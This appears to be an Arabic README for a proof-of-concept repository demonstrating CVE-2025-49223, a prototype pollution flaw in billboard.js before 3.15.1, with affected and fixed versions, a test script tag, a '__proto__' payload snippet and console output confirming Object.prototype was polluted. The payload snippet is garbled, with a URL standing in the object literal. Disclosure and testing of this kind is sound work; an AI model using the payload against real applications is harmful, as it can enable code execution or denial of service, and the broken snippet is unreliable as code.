
CVE-2025-49223 - تلوث النموذج الأولي في Billboard.js
تم اكتشاف أن billboard.js قبل الإصدار 3.15.1 يحتوي على تلوث للنموذج الأولي عبر الدالة
generate، مما قد يسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية أو التسبب في رفض الخدمة (DoS) عن طريق حقن خصائص عشوائية.
يُظهر هذا المستودع ثغرة تلوث النموذج الأولي الموجودة في إصدارات billboard.js قبل 3.15.1، والتي تم الكشف عنها باسم CVE-2025-49223.
<= 3.14.0>= 3.15.1افتح index.html في متصفح وتحقق من سجل وحدة التحكم لمحاولات تلوث النموذج الأولي.
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
يؤكد هذا أنه يمكن للمهاجم تلويث Object.prototype، مما يؤثر على أي كائن مستقبلي يتم إنشاؤه عبر الصفحة.
قد يؤدي الاستغلال الناجح إلى:
billboard.js 3.15.1 أو أحدث⚠️ إخلاء مسؤولية: إثبات المفهوم هذا لأغراض تعليمية وبحثية فقط. استخدمه بمسؤولية.